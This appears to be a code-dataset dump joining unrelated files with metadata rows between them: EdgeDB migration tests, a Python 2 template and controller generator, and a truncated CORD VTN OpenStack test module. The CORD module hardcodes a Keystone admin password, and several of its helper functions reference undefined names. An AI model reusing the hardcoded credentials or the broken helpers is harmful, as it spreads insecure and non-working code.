DESCRIBE CURRENT MIGRATION;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute COMMIT MIGRATION"
r" outside of a migration block",
):
await self.con.execute('''
COMMIT MIGRATION;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute ABORT MIGRATION"
r" outside of a migration block",
):
await self.con.execute('''
ABORT MIGRATION;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute POPULATE MIGRATION"
r" outside of a migration block",
):
await self.con.execute('''
POPULATE MIGRATION;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute CREATE DATABASE"
r" in a migration block",
):
await self.start_migration('type Foo;')
await self.con.execute('''
CREATE DATABASE should_not_happen;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute CREATE ROLE"
r" in a migration block",
):
await self.start_migration('type Foo;')
await self.con.execute('''
CREATE ROLE should_not_happen;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute CREATE MIGRATION"
r" in a migration block",
):
await self.start_migration('type Foo;')
await self.con.execute('''
CREATE MIGRATION blah;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute START MIGRATION"
r" in a migration block",
):
await self.start_migration('type Foo;')
await self.con.execute('''
START MIGRATION TO { module test { type Foo; }};
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute START TRANSACTION"
r" in a migration block",
):
await self.start_migration('type Foo;')
await self.con.query('''
START TRANSACTION;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute START TRANSACTION"
r" in a migration block",
):
await self.start_migration('type Foo;')
await self.con.query('''
START TRANSACTION;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute CONFIGURE INSTANCE"
r" in a migration block",
):
await self.start_migration('type Foo;')
await self.con.execute('''
CONFIGURE INSTANCE SET _foo := 123;
''')
async with self.assertRaisesRegexTx(
edgedb.QueryError,
r"cannot execute CONFIGURE DATABASE"
r" in a migration block",
):
await self.start_migration('type Foo;')
await self.con.execute('''
CONFIGURE CURRENT DATABASE SET _foo := 123;
''')
@test.xfail('''
edgedb.errors.InvalidReferenceError: scalar type 'test::Alias'
does not exist
''')
async def test_edgeql_migration_alias_01(self):
await self.migrate(r'''
type Foo {
property name -> str;
property comp := Alias;
};
alias Alias := {0, 1, 2, 3};
''')
# Make sure that the objects can actually be created and
# queried.
await self.con.execute('''
SET MODULE test;
INSERT Foo {name := 'foo'};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
'comp': {0, 1, 2, 3},
},
],
)
@test.xfail('''
        Referring to an alias from a computable is unsupported.
        This is the only test that broke when we disallowed that!
''')
async def test_edgeql_migration_alias_02(self):
await self.migrate(r'''
type Foo {
property name -> str;
property comp := Alias + 0;
};
alias Alias := {0, 1, 2, 3};
''')
# Make sure that the objects can actually be created and
# queried.
await self.con.execute('''
SET MODULE test;
INSERT Foo {name := 'foo'};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
'comp': {0, 1, 2, 3},
},
],
)
await self.migrate(r'''
type Foo {
property name -> str;
property comp := Alias + 0;
};
alias Alias := {4, 5};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
'comp': {4, 5},
},
],
)
@test.xfail('''
The second migration check produces the following issue:
No more "proposed", but not "completed" either.
''')
async def test_edgeql_migration_alias_03(self):
await self.migrate(r'''
type Foo {
property name -> str;
property comp := {Alias, Alias};
};
alias Alias := 42;
''')
# Make sure that the objects can actually be created and
# queried.
await self.con.execute('''
SET MODULE test;
INSERT Foo {name := 'foo'};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
'comp': [42, 42],
},
],
)
await self.migrate(r'''
type Foo {
property name -> str;
property comp := {Alias, Alias};
};
alias Alias := 'alias';
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
'comp': ['alias', 'alias'],
},
],
)
@test.xfail('''
The migration works, but then the query produces this error
(implying that the migration didn't update the type of the computable).
edgedb.errors.InvalidValueError: invalid input syntax for type
std::int64: "alias"
''')
async def test_edgeql_migration_alias_04(self):
# Same as the previous test, but using a single DDL command to
# migrate.
await self.migrate(r'''
type Foo {
property name -> str;
property comp := {Alias, Alias};
};
alias Alias := 42;
''')
# Make sure that the objects can actually be created and
# queried.
await self.con.execute('''
SET MODULE test;
INSERT Foo {name := 'foo'};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
'comp': [42, 42],
},
],
)
# Instead of using an SDL migration, use a single DDL command.
await self.con.execute('''
ALTER ALIAS Alias USING ('alias');
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
'comp': ['alias', 'alias'],
},
],
)
@test.xfail('''
edgedb.errors.InvalidReferenceError: object type 'test::Alias'
does not exist
''')
async def test_edgeql_migration_alias_05(self):
await self.migrate(r'''
type Foo {
property name -> str;
link comp := Alias;
};
type Bar;
alias Alias := Bar {val := 42};
''')
# Make sure that the objects can actually be created and
# queried.
await self.con.execute('''
SET MODULE test;
INSERT Bar;
INSERT Foo {name := 'foo'};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp: {
val
},
}
''',
[
{
'name': 'foo',
'comp': {
'val': 42,
},
},
],
)
@test.xfail('''
The second migration check produces the following issue:
No more "proposed", but not "completed" either.
''')
async def test_edgeql_migration_alias_06(self):
await self.migrate(r'''
type Foo {
property name -> str;
property comp := Alias.val;
};
type Bar;
alias Alias := Bar {val := 42};
''')
# Make sure that the objects can actually be created and
# queried.
await self.con.execute('''
SET MODULE test;
INSERT Bar;
INSERT Foo {name := 'foo'};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
'comp': {42},
},
],
)
await self.migrate(r'''
type Foo {
property name -> str;
property comp := Alias.val;
};
type Bar;
alias Alias := Bar {val := 'val'};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp,
}
''',
[
{
'name': 'foo',
'comp': {'val'},
},
],
)
@test.xfail('''
edgedb.errors.InvalidReferenceError: object type 'test::Fuz'
does not exist
''')
async def test_edgeql_migration_alias_07(self):
await self.migrate(r'''
type Foo {
property name -> str;
link comp := Alias.alias_link;
};
type Bar {
property val -> str;
};
type Fuz {
property val -> str;
};
alias Alias := Bar {
alias_link := Fuz {
alias_comp := 42,
}
};
''')
# Make sure that the objects can actually be created and
# queried.
await self.con.execute('''
SET MODULE test;
INSERT Bar {val := 'bar'};
INSERT Fuz {val := 'fuz'};
INSERT Foo {name := 'foo'};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp: {
val,
alias_comp,
},
}
''',
[
{
'name': 'foo',
'comp': [{
'val': 'fuz',
                        'alias_comp': 42,
}],
},
],
)
await self.migrate(r'''
type Foo {
property name -> str;
link comp := Alias.alias_link;
};
type Bar {
property val -> str;
};
type Fuz {
property val -> str;
};
alias Alias := Bar {
alias_link := Fuz {
alias_comp := 42,
}
};
''')
await self.assert_query_result(
r'''
SELECT Foo {
name,
comp: {
val
},
}
''',
[
{
'name': 'foo',
'comp': [{
'val': 'bar',
                        'alias_comp': 42,
}],
},
],
)
class TestEdgeQLDataMigrationNonisolated(tb.DDLTestCase):
TRANSACTION_ISOLATION = False
async def test_edgeql_migration_eq_collections_25(self):
await self.con.execute(r"""
START MIGRATION TO {
module test {
alias Foo := [20];
}
};
POPULATE MIGRATION;
COMMIT MIGRATION;
""")
await self.con.execute(r"""
START MIGRATION TO {
module test {
}
};
POPULATE MIGRATION;
COMMIT MIGRATION;
""")
async def test_edgeql_ddl_collection_cleanup_06(self):
for _ in range(2):
await self.con.execute(r"""
CREATE FUNCTION cleanup_06(
a: int64
) -> tuple<int64, tuple<int64>>
USING EdgeQL $$
SELECT (a, ((a + 1),))
$$;
""")
await self.con.execute(r"""
DROP FUNCTION cleanup_06(a: int64)
""")
| 27.453701
| 79
| 0.390993
| 22,096
| 283,734
| 4.901837
| 0.041999
| 0.087997
| 0.048472
| 0.044206
| 0.840219
| 0.811672
| 0.763182
| 0.714812
| 0.674244
| 0.631903
| 0
| 0.017312
| 0.506101
| 283,734
| 10,334
| 80
| 27.456358
| 0.755587
| 0.032791
| 0
| 0.722746
| 0
| 0
| 0.535472
| 0.005977
| 0
| 0
| 0.000057
| 0
| 0.048661
| 1
| 0.000377
| false
| 0
| 0.001257
| 0
| 0.002389
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ed5299b123331663ab8d4095f44fa2080d4c581e
| 7,458
|
py
|
Python
|
emerald/template_generator.py
|
femmerling/EmeraldBox
|
68f5776577f0c929ca1f5ba23f1dfe480f813037
|
[
"MIT"
] | 17
|
2015-01-15T21:41:16.000Z
|
2021-01-10T15:34:09.000Z
|
emerald/template_generator.py
|
femmerling/EmeraldBox
|
68f5776577f0c929ca1f5ba23f1dfe480f813037
|
[
"MIT"
] | null | null | null |
emerald/template_generator.py
|
femmerling/EmeraldBox
|
68f5776577f0c929ca1f5ba23f1dfe480f813037
|
[
"MIT"
] | 5
|
2015-02-07T02:41:18.000Z
|
2016-11-11T02:50:21.000Z
|
import os.path
from config import BASEDIR
from config import WHITE_SPACE
def generate_index_template(model_name, model_components):
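    # Write the Jinja2 list view (app/templates/<model>.html): a table of
    # entries with edit/delete links and an "add new entry" link.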
model_name = model_name.lower()
template_path = os.path.join(BASEDIR, 'app/templates/' + model_name + '.html')
template_file = open(template_path, 'w')
template_file.write("{% extends \"base.html\" %}\n")
template_file.write("{% block content %}\n")
template_file.write("\t\t<h1>List of " + model_name.title() + " Entries.</h1>\n")
template_file.write("\t\t<table id=\"list-view\">\n")
template_file.write("\t\t\t<thead>\n")
template_file.write("\t\t\t\t<tr>\n")
template_file.write("\t\t\t\t\t<td><b>ID</td>\n")
for component in model_components:
template_file.write("\t\t\t\t\t<td><b>" + component['field_name'].title() + "</b></td>\n")
template_file.write("\t\t\t\t\t<td><b> </td>\n")
template_file.write("\t\t\t\t\t<td><b> </td>\n")
template_file.write("\t\t\t\t</tr>\n")
template_file.write("\t\t\t</thead>\n")
template_file.write("\t\t\t{% if " + model_name + "_entries %}\n")
template_file.write("\t\t\t<tbody>\n")
template_file.write("\t\t\t{% for entry in " + model_name + "_entries %}\n")
template_file.write("\t\t\t\t<tr>\n")
template_file.write("\t\t\t\t\t<td><a href=\"/"+model_name+"/{{ entry.id }}\">{{ entry.id }}</a></td>\n")
for component in model_components:
template_file.write("\t\t\t\t\t<td>{{ entry." + component['field_name'] + " }}</td>\n")
template_file.write('\t\t\t\t\t<td><a href="/' + model_name + '/edit/{{ entry.id }}">Edit</a></td>\n')
template_file.write('\t\t\t\t\t<td><a id="delete-link" data-callback="/' + model_name + '/" data-url="/' + model_name + '/{{ entry.id }}">Delete</a></td>\n')
template_file.write("\t\t\t\t</tr>\n")
template_file.write("\t\t\t{% endfor %}\n")
template_file.write("\t\t\t</tbody>\n")
template_file.write("\t\t</table>\n")
template_file.write("\t\t\t{% else %}\n")
template_file.write("\t\t</table>\n")
template_file.write("\t\tYou have no entries yet\n")
template_file.write("\t\t\t{% endif %}\n")
template_file.write('\t\t\t<br/><br/><b><a id="actions" href="/' + model_name + '/add">Add new entry</a></b>\n')
template_file.write("{% endblock %}\n")
print "index template generated"
def generate_view_template(model_name, model_components):
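    # Write the single-entry view template (app/templates/<model>_view.html)
    # showing each field of one record.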
model_name = model_name.lower()
template_path = os.path.join(BASEDIR, 'app/templates/' + model_name + '_view.html')
template_file = open(template_path, 'w')
template_file.write("{% extends \"base.html\" %}\n")
template_file.write("{% block content %}\n")
template_file.write("\t\t<h1>View " + model_name.title() + " single entry.</h1>\n")
template_file.write("\t\t<table>\n")
for component in model_components:
template_file.write("\t\t\t\t<tr>\n")
template_file.write("\t\t\t\t\t<td>" + component['field_name'].title() + ":</td>\n")
template_file.write("\t\t\t\t\t<td>{{ " + model_name + "." + component['field_name'].lower() + " }}</td>\n")
template_file.write("\t\t\t\t</tr>\n")
template_file.write("\t\t</table>\n")
template_file.write("{% endblock %}")
print 'view template generated'
def generate_edit_template(model_name, model_components):
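    # Append the /<model>/edit/<id> route to the model's controller and write
    # the edit form template (app/templates/<model>_edit.html).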
model_name = model_name.lower()
controller_path = os.path.join(BASEDIR, 'app/controllers/'+model_name+'.py')
template_path = os.path.join(BASEDIR, 'app/templates/' + model_name + '_edit.html')
controller_file = open(controller_path, 'a')
controller_file.write("@"+model_name+"_view.route('/" + model_name + "/edit/<id>')\n")
controller_file.write("def " + model_name + "_edit_controller(id):\n")
controller_file.write(WHITE_SPACE + "#this is the controller to edit model entries\n")
controller_file.write(WHITE_SPACE + model_name + "_item = " + model_name.title() + ".query.get(id)\n")
controller_file.write(WHITE_SPACE + "return render_template('" + model_name + "_edit.html', " + model_name + "_item = " + model_name + "_item, title = \"Edit Entries\")\n\n")
template_file = open(template_path, 'w')
template_file.write("{% extends \"base.html\" %}\n")
template_file.write("{% block content %}\n")
template_file.write("\t\t<h1>Edit " + model_name.title() + " Entries.</h1>\n")
template_file.write("\t\t<form id=\"edit-form\" name=\"" + model_name + "_add\" method=\"put\" action=\"/" + model_name + "/{{ " + model_name + "_item.id }}\">\n")
template_file.write("\t\t<input type=\"hidden\" id=\"url\" value=\"/"+model_name+"/{{ " + model_name + "_item.id }}\">\n")
template_file.write("\t\t<table>\n")
for component in model_components:
template_file.write("\t\t\t\t<tr>\n")
template_file.write("\t\t\t\t\t<td>" + component['field_name'].title() + ":</td>\n")
template_file.write("\t\t\t\t\t<td><input type=\"text\" name=\"" + component['field_name'].lower() + "\" value=\"{{ " + model_name + "_item." + component['field_name'].lower() + " }}\"/></td>\n")
template_file.write("\t\t\t\t</tr>\n")
template_file.write("\t\t\t\t<tr>\n")
template_file.write("\t\t\t\t\t<td><input id=\"submit-put\" type=\"submit\" name=\"submit\" value=\"Edit Entry\"/></td>\n")
template_file.write("\t\t\t\t\t<td> </td>\n")
template_file.write("\t\t\t\t</tr>\n")
template_file.write("\t\t</table>\n")
template_file.write("\t\t</form>\n")
template_file.write("{% endblock %}")
print 'Entries edit and update form controller added'
def generate_controller_template(model_name, model_components):
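    # Append the /<model>/add/ route to the model's controller and write the
    # add form template (app/templates/<model>_add.html).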
model_name = model_name.lower()
controller_path = os.path.join(BASEDIR, 'app/controllers/'+model_name+'.py')
template_path = os.path.join(BASEDIR, 'app/templates/' + model_name + '_add.html')
controller_file = open(controller_path, 'a')
controller_file.write("@"+model_name+"_view.route('/" + model_name + "/add/')\n")
controller_file.write("def " + model_name + "_add_controller():\n")
controller_file.write(WHITE_SPACE + "#this is the controller to add new model entries\n")
controller_file.write(WHITE_SPACE + "return render_template('" + model_name + "_add.html', title = \"Add New Entry\")\n\n")
template_file = open(template_path, 'w')
template_file.write("{% extends \"base.html\" %}\n")
template_file.write("{% block content %}\n")
template_file.write("\t\t<h1>Add new " + model_name.title() + " Entries.</h1>\n")
template_file.write("\t\t<form name=\"" + model_name + "_add\" method=\"post\" action=\"/" + model_name + "/\">\n")
template_file.write("\t\t<table>\n")
for component in model_components:
template_file.write("\t\t\t\t<tr>\n")
template_file.write("\t\t\t\t\t<td>" + component['field_name'].title() + ":</td>\n")
template_file.write("\t\t\t\t\t<td><input type=\"text\" name=\"" + component['field_name'].lower() + "\"/></td>\n")
template_file.write("\t\t\t\t</tr>\n")
template_file.write("\t\t\t\t<tr>\n")
template_file.write("\t\t\t\t\t<td><input type=\"submit\" name=\"submit\" value=\"Add Entry\"/></td>\n")
template_file.write("\t\t\t\t\t<td> </td>\n")
template_file.write("\t\t\t\t</tr>\n")
template_file.write("\t\t</table>\n")
template_file.write("\t\t</form>\n")
template_file.write("{% endblock %}")
print 'Data add form controller generated'
# end of file
| 52.521127
| 203
| 0.629525
| 1,152
| 7,458
| 3.897569
| 0.086806
| 0.067706
| 0.06147
| 0.25657
| 0.830735
| 0.804454
| 0.790869
| 0.765924
| 0.752339
| 0.752339
| 0
| 0.001247
| 0.139716
| 7,458
| 142
| 204
| 52.521127
| 0.698566
| 0.001475
| 0
| 0.517544
| 1
| 0.008772
| 0.359388
| 0.024711
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.026316
| null | null | 0.035088
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ed5355e81bd0d49ef118c0f9cf73d96eeb0001fa
| 95
|
py
|
Python
|
test/module/file.py
|
yawpei/pylearning
|
b0e8b6cf62074c284ea10a0473766fdf9892565a
|
[
"Apache-2.0"
] | null | null | null |
test/module/file.py
|
yawpei/pylearning
|
b0e8b6cf62074c284ea10a0473766fdf9892565a
|
[
"Apache-2.0"
] | null | null | null |
test/module/file.py
|
yawpei/pylearning
|
b0e8b6cf62074c284ea10a0473766fdf9892565a
|
[
"Apache-2.0"
] | null | null | null |
# file.py
def create_name():
return "new_file.txt"
def create_time():
return "today"
| 11.875
| 25
| 0.652632
| 14
| 95
| 4.214286
| 0.714286
| 0.305085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 95
| 7
| 26
| 13.571429
| 0.786667
| 0.073684
| 0
| 0
| 0
| 0
| 0.197674
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
ed70674cedd77b886a4a585262c099fed50a7d65
| 279,854
|
py
|
Python
|
src/test/cordvtn/cordvtnTest.py
|
huseyinbolt/cord-tester
|
ed9b79916e6326a45bfaf3227b8ff922d76df4f1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/test/cordvtn/cordvtnTest.py
|
huseyinbolt/cord-tester
|
ed9b79916e6326a45bfaf3227b8ff922d76df4f1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/test/cordvtn/cordvtnTest.py
|
huseyinbolt/cord-tester
|
ed9b79916e6326a45bfaf3227b8ff922d76df4f1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Copyright 2016-present Ciena Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import os,sys
import keystoneclient.v2_0.client as ksclient
import keystoneclient.apiclient.exceptions
import neutronclient.v2_0.client as nclient
import neutronclient.common.exceptions
import novaclient.v1_1.client as novaclient
from novaclient import client as nova_client
from multiprocessing import Pool
from neutronclient.v2_0 import client as neutron_client
import neutronclient.v2_0.client as neutronclient
from nose.tools import assert_equal
from CordTestUtils import get_mac, log_test
from onosclidriver import OnosCliDriver
from OnosCtrl import OnosCtrl
from CordLogger import CordLogger
from TestManifest import TestManifest
from OnosFlowCtrl import OnosFlowCtrl
from scapy.all import *
from credentials import *
from VSGAccess import VSGAccess
from SSHTestAgent import SSHTestAgent
import requests
import time
import py_compile
import json
PROTO_NAME_TCP = 'tcp'
PROTO_NAME_ICMP = 'icmp'
IPv4 = 'IPv4'
OS_USERNAME = 'admin'
OS_PASSWORD = 'VeryLongKeystoneAdminPassword'
OS_TENANT = 'admin'
OS_AUTH_URL = 'https://keystone.cord.lab:5000/v2.0'
OS_SERVICE_ENDPOINT = 'https://keystone.cord.lab:5000/v2.0/'
VM_BOOT_TIMEOUT = 100
VM_DELETE_TIMEOUT = 100
#VM SSH CREDENTIALS
VM_USERNAME = 'ubuntu'
VM_PASSWORD = 'ubuntu'
TENANT_PREFIX = 'test-'
VM_PREFIX = 'test-'
NETWORK_PREFIX = 'test-'
CIDR_PREFIX = '192.168'
class vtn_validation_utils:
endpoint = '172.17.0.5'
version = ''
vtn_app = 'org.opencord.vtn'
def __init__(self, version):
self.version = version
self.manifest = None
self.vtn_enabled = False
manifest = os.getenv('MANIFEST', None)
if manifest:
self.manifest = TestManifest(manifest = manifest)
self.endpoint = self.manifest.onos_ip
self.vtn_enabled = self.manifest.synchronizer == 'vtn'
self.app_ctrl = OnosCtrl(self.vtn_app, controller = self.endpoint)
def getDevices(self):
return OnosCtrl.get_devices(controller = self.endpoint)
def getLinks(self):
return OnosCtrl.get_links(controller = self.endpoint)
def getDevicePorts(self, switch_id):
return OnosCtrl.get_ports_device(switch_id, controller = self.endpoint)
def activateVTNApp(self):
return self.app_ctrl.activate()
def deactivateVTNApp(self):
return self.app_ctrl.deactivate()
class cordvtn_exchange(CordLogger):
app_cordvtn = 'org.opencord.vtn'
test_path = os.path.dirname(os.path.realpath(__file__))
cordvtn_dir = os.path.join(test_path, '..', 'setup')
cordvtn_conf_file = os.path.join(test_path, '..', '../cordvtn/network_cfg.json')
head_node_user = 'vagrant'
head_node_pass = 'vagrant'
head_node = os.getenv('HEAD_NODE', 'prod')
head_node_ip = '10.1.0.1'
HEAD_NODE = head_node + '.cord.lab' if len(head_node.split('.')) == 1 else head_node
@classmethod
def setUpClass(cls):
''' Activate the cordvtn app'''
time.sleep(3)
cls.onos_ctrl = OnosCtrl(cls.app_cordvtn)
status, _ = cls.onos_ctrl.activate()
#assert_equal(status, True)
time.sleep(3)
cls.cordvtn_setup()
@classmethod
def tearDownClass(cls):
'''Deactivate the cord vtn app'''
#cls.onos_ctrl.deactivate()
#cls.cord_vtn_cleanup()
@classmethod
def cordvtn_setup(cls):
pass
@classmethod
def cord_vtn_cleanup(cls):
##reset the ONOS port configuration back to default
pass
@classmethod
def onos_load_config(cls, cordvtn_conf_file):
status, code = OnosCtrl.config(cordvtn_conf_file)
if status is False:
log_test.info('JSON request returned status %d' %code)
assert_equal(status, True)
time.sleep(3)
def get_neutron_credentials(self):
n = {}
n['username'] = os.environ['OS_USERNAME']
n['password'] = os.environ['OS_PASSWORD']
n['auth_url'] = os.environ['OS_AUTH_URL']
n['tenant_name'] = os.environ['OS_TENANT_NAME']
n['ca_cert'] = os.environ['REQUESTS_CA_BUNDLE']
return n
@classmethod
def get_compute_nodes(cls):
credentials = get_nova_credentials_v2()
novaclient = nova_client.Client('2', **credentials)
print novaclient.hypervisors.list()
return novaclient.hypervisors.list()
def create_network(i):
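    # Create a neutron network named 'network-<i>', retrying until the
    # request succeeds.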
neutron_credentials = get_neutron_credentials()
neutron = neutron_client.Client(**neutron_credentials)
json = {'network': {'name': 'network-' + str(i),
'admin_state_up': True}}
while True:
try:
net = neutron.create_network(body=json)
print '\nnetwork-' + str(i) + ' created'
return net
except Exception as e:
print e
continue
def create_tenant(tenant_name):
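    # Create a keystone tenant plus two users and return its name, id and
    # status.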
new_tenant = keystone.tenants.create(tenant_name=tenant_name,
description="CORD Tenant \
created",
enabled=True)
tenant_id = new_tenant.id
tenant_status = True
user_data = []
for j in range(2):
j += 1
user_name = tenant_name + '-user-' + str(j)
user_data.append(create_user(user_name, tenant_id))
print " Tenant and User Created"
tenant_data = {'tenant_name': tenant_name,
'tenant_id': tenant_id,
'status': tenant_status}
return tenant_data
def create_user(user_name, tenant_id):
new_user = keystone.users.create(name=user_name,
password="ubuntu",
tenant_id=tenant_id)
print(' - Created User %s' % user_name)
keystone.roles.add_user_role(new_user, member_role, tenant_id)
if assign_admin:
admin_user = keystone.users.find(name='admin')
admin_role = keystone.roles.find(name='admin')
keystone.roles.add_user_role(admin_user, admin_role, tenant_id)
user_data = {'name': new_user.name,
'id': new_user.id}
return user_data
def create_port( router_id, network_id):
credentials = get_credentials()
neutron = client.Client(**credentials)
router = neutron.show_router(router_id)
value = {'port':{
'admin_state_up':True,
'device_id': router_id,
'name': 'port1',
'network_id':network_id,
}}
response = neutron.create_port(body=value)
def router_create(self, name):
external_network = None
for network in self.neutron.list_networks()["networks"]:
if network.get("router:external"):
external_network = network
break
if not external_network:
raise Exception("Alarm! Can not to find external network")
gw_info = {
"network_id": external_network["id"],
"enable_snat": True
}
router_info = {
"router": {
"name": name,
"external_gateway_info": gw_info,
"tenant_id": self.tenant_id
}
}
router = self.neutron.router_create(router_info)['router']
return router
def delete_tenant(tenant_name):
tenant = keystone.tenants.find(name=tenant_name)
for j in range(2):
j += 1
user_name = tenant_name + '-user-' + str(j)
delete_user(user_name, tenant.id)
tenant.delete()
print(' - Deleted Tenant %s ' % tenant_name)
return True
def delete_user(user_name, tenant_id):
user = keystone.users.find(name=user_name)
user.delete()
print(' - Deleted User %s' % user_name)
return True
def set_environment(tenants_num=0, networks_per_tenant=1, vms_per_network=2):
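    # Provision test tenants, a network/subnet/router per tenant, and boot
    # VMs attached to each network.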
octet = 115
vm_inc = 11
image = nova_connection.images.get(IMAGE_ID)
flavor = nova_connection.flavors.get(FLAVOR_ID)
admin_user_id = keystone_connection.users.find(name=OS_USERNAME).id
member_role_id = keystone_connection.roles.find(name='Member').id
for num_tenant in range(1, tenants_num+1):
tenant = keystone_connection.tenants.create('%stenant%s' % (TENANT_PREFIX, num_tenant))
keystone_connection.roles.add_user_role(admin_user_id, member_role_id, tenant=tenant.id)
for num_network in range(networks_per_tenant):
network_json = {'name': '%snet%s' % (NETWORK_PREFIX, num_tenant*10+num_network),
'admin_state_up': True,
'tenant_id': tenant.id}
network = neutron_connection.create_network({'network': network_json})
subnet_json = {'name': '%ssubnet%s' % (NETWORK_PREFIX, num_tenant*10+num_network),
'network_id': network['network']['id'],
'tenant_id': tenant.id,
'enable_dhcp': True,
'cidr': '%s.%s.0/24' % (CIDR_PREFIX, octet), 'ip_version': 4}
octet += 1
subnet = neutron_connection.create_subnet({'subnet': subnet_json})
router_json = {'name': '%srouter%s' % (NETWORK_PREFIX, num_tenant*10+num_network),
'tenant_id': tenant.id}
router = neutron_connection.router_create({'router': router_json})
port = neutron_connection.add_interface_router(router['router']['id'], {'subnet_id': subnet['subnet']['id']})
for num_vm in range(vms_per_network):
tenant_nova_connection = novacli.Client(OS_USERNAME, OS_PASSWORD, tenant.name, OS_AUTH_URL)
m = tenant_nova_connection.servers.create('%svm%s' % (VM_PREFIX, vm_inc), image, flavor, nics=[{'net-id': network['network']['id']}, {'net-id': MGMT_NET}])
vm_inc += 1
def verify_neutron_crud():
x = os.system("neutron_test.sh")
return x
def list_floatingips( **kwargs):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
return neutron.list_floatingips(**kwargs)['floatingips']
def list_security_groups( **kwargs):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
return neutron.list_security_groups(**kwargs)['security_groups']
def list_subnets( **kwargs):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
return neutron.list_subnets(**kwargs)['subnets']
def list_networks( **kwargs):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
return neutron.list_networks(**kwargs)['networks']
def list_ports( **kwargs):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
return neutron.list_ports(**kwargs)['ports']
def list_routers( **kwargs):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
return neutron.list_routers(**kwargs)['routers']
def update_floatingip( fip, port_id=None):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
neutron.update_floatingip(fip, {"floatingip":
{"port_id": port_id}})
def update_subnet( subnet_id, **subnet_params):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
neutron.update_subnet(subnet_id, {'subnet': subnet_params})
def update_router( router_id, **router_params):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
neutron.update_router(router_id, {'router': router_params})
def router_gateway_set( router_id, external_gateway):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
neutron.update_router(
router_id, {'router': {'external_gateway_info':
{'network_id': external_gateway}}})
def router_gateway_clear( router_id):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
neutron.update_router(
router_id, {'router': {'external_gateway_info': None}})
def router_add_interface( router_id, subnet_id):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
neutron.add_interface_router(router_id, {'subnet_id': subnet_id})
def router_rem_interface( router_id, subnet_id):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
neutron.remove_interface_router(
router_id, {'subnet_id': subnet_id})
def create_floatingip( **floatingip_params):
creds = get_neutron_credentials()
neutron = client.Client(**creds)
response = neutron.create_floatingip(
